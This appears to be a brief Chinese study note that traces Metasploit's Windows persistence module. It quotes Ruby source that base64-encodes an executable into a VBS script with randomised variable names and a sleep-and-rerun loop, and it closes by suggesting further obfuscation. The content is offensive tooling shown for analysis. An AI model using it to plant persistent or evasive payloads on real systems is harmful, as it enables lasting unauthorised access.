persist调用
/usr/local/share/metasploit-framework/modules/exploits/windows/local/persistence.rb
exe = generate_payload_exe # Generate the vbs payload vprint_status("Generating VBS persistent script (#{rvbs_name})") vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
::Msf::Util::EXE.to_exe_vbs 来自 /usr/local/share/metasploit-framework/lib/msf/util/exe.rb
# self.to_exe_vba # # @param exes [String] # @param opts [Hash] # @option opts [String] :delay # @option opts [String] :persists # @option opts [String] :exe_filename def self.to_exe_vbs(exes = '', opts = {}) delay = opts[:delay] || 5 persist = opts[:persist] || false hash_sub = {} hash_sub[:exe_filename] = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe' hash_sub[:base64_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64' hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes) hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:init] = "" if persist hash_sub[:init] << "Do\r\n" hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n" hash_sub[:init] << "Loop\r\n" else hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" end read_replace_script_template("to_exe.vbs.template", hash_sub) end
to_exe.vbs.template 来自 /usr/local/share/metasploit-framework/data/templates/scripts/to_exe.vbs.template
然后,各种变形混淆吧